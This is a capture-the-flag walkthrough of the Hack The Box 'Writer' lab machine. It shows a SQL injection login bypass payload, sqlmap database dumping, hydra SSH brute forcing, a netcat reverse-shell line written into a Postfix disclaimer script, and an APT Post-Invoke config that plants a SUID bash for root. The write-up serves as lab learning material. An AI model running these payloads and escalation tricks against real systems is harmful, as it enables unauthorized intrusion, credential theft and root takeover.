Prelude
Writer was an intermediate machine from Hack The Box, developed by TheCyberGeek.
This was a good learning experience and this machine’s initial foothold was a bit too realistic, by bruteforcing a user named kyle’s ssh login.
Once we are inside the machine, we can see that there are some peculiar groups that the user is part of. By looking up for directories and folders owned by this user, we can see that the user can write to Postfix smtpd’s disclaimer script. We can abuse this permission to spawn a shell as the higher privileged user named John.
With some basic enum, we will find that John is also part of a custom group and by following this group owned files/directories, we will find that John is able to write APT configuration files to /etc/apt/apt.conf.d directory. We can then abuse this privilege to spawn a root shell!
Let’s start the exploitation.
Exploitation
Starting the exploitation with the usual Nmap scan.
nmap -sCV -v -oN tcp 10.10.11.101
And got the following result.
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| WRITER<00> Flags: <unique><active>
| WRITER<03> Flags: <unique><active>
| WRITER<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-03T08:02:49
|_ start_date: N/A
I started the enumeration with SMB and found some inaccessible SMB shares.
smbclient -L 10.10.11.101 -U '' -N
Then I decided to direct my enumeration to port 80. I navigated to http://10.10.11.101/ and found the following web page.
The first thing I noticed was that, there were no extensions to pages. There were only directories.
That means navigating to index .php/.html didn’t not work; but navigating to / works. This is a strong indication of a python/ruby webserver.
I ran gobuster and found a directory named /administrative.
Tis login was bypassed by using the following payload as the username/password on the URL http://10.10.11.101/dashboard.
admin@writer.htb' OR 1=1#
I have also found a way to upload files to the story edit section by spoofing the file format.
It was succesfully uploaded to http://10.10.11.101/static/img/.
But, I couldn’t find a way to execute the uploaded file.
There was also a Blind SQL Injection vulnerability in the /administrative login page.
I used the following command to exfiltrate the username and password hash of user admin from database.
sqlmap -r burp/login.req --batch --dump --dbms=mysql -T users -C email,password,username
I’ve tried to crack the hash, but I failed to crack the hash.
Since it was a blind sql vulnerability, I have decided to exfiltrate files from the server, namely /etc/apache2/apache2.conf file. However, I gave up on exfiltration due to extreeeeeemely slow response from the server. I have tried this for more than 6-7 hours and I still couldn’t download the file. 😢
So, I’ve decided to change my focus from this vector.
Moving on…
I’ve diverted my focus to port 135 and connected to the port using rpcclient.
rpcclient -L 10.10.11.101 -U '' -N
Then I’ve used enumdomusers command to find users and found a user named Kyle.
Since this machine had SSH, I’ve decided to perform SSH bruteforcing this user using hydra.
hydra -l 'kyle' -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.101 -t 60
And after several minutes, the password was cracked as marcoantonio.
I used this password to login to SSH as kyle.
Privilege Escalation #1
Once I was in as kyle, I have found that Kyle is a member of groups smbgroup and filter.
I’ve used the following command to list all directories and folders, that were owned by the group filter.
find / -group filter 2>/dev/null
The file /var/spool/disclaimer was a bash script, that uses a tool called altermime to automatically attach a disclaimer text, which is defined in a text file called disclaimer.txt.
We can define all sender email addresses for which alterMIME should add a disclaimer to in a file called disclaimer_addresses.
Read more from here.
I then checked for open ports in the machine with ss -tulnp and found that port 25 is open and listening to local connections.
I’ve also found an excellent article from Viperone’s gitbook about exploiting disclaimer script in postfix to escalate privileges. Now, we need to find the contents of disclaimer_addresses, so that we can exploit this.
The disclaimer_addresses file contained the following addresses.
Then I replaced script with the following netcat reverse shell payload.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.45 9001 >/tmp/f' > disclaimerThen I forwarded port 25 of writer.htb to my localport 8025 using SSH and used telnet to connect to it.
Then I send an email from root@writer.htb to kyle@writer.htb using the following payload.
helo test
MAIL FROM: root@writer.htb
RCPT TO: kyle@writer.htb
DATA
test
.The . (dot) at the end will terminate the DATA header and the mail will be sent.
Since, the address root@writer.htb is in the disclaimer_addresses file, the SMTPd will execute the disclaimer script and we’ll get a shell back!
And I got a shell back as John!
Privilege Escalation #2
Just like kyle, user John also had some unusual group membership.
John was a member of the group named management, which was found using the groups command. I then repeated what we did just before.
find / -group management 2>/dev/null
I found that the directory /etc/apt/apt.conf.d was owned by the group management. This is a special directory for the Aptitude package manager and files placed here will be loaded to apt, when apt is executed.
With a little research, I’ve found a way to get code execution by placing a malicious apt configuration file in the said directory. Source #1 Source #2
Combining these information, I’ve made a file /etc/apt/apt.conf.d/11test.conf with the following contents. This command will be executed after apt update command is finished executing. The payload will make a copy of bash binary with SUID bit set to /tmp.
APT::Update::Post-Invoke {"cp /bin/bash /tmp;chmod 4755 /tmp/bash; touch /tmp/list";};
I have executed apt changelog apt to view the changelog of apt.
I’ve used apt changelog, because the user John couldn’t execute apt update directly and executing apt changelog will bypass this and trigger an apt update and my payload will get executed after finishing the execution of apt update command..
This step was extremely finnicky for me since I had to change package names in apt changelog (I used nano and apt intermittently) repeatedly (still not sure this was necessary step or was a placebo) and my apt config file was getting automatically deleted every 1 or 2 minutes.
I’ve used these changelog commands to trigger the payload.
apt changelog apt
apt changelog nanoGaining root in this machine was a game of repeatedly saving the config file and calling apt changelog command.
But, with some tinkering, the bash binary was copied to /tmp and I’ve used /tmp/bash -p command to spawn a root bash shell in the machine.
Postlude
And that was Writer!
This was a very finnicky box and wasn’t a pleasant experience to me at all! But, in the end, I’ve learned some new tricks.
Kudos to TheCyberGeek for this machine!
Peace out! ✌️
SecNigma 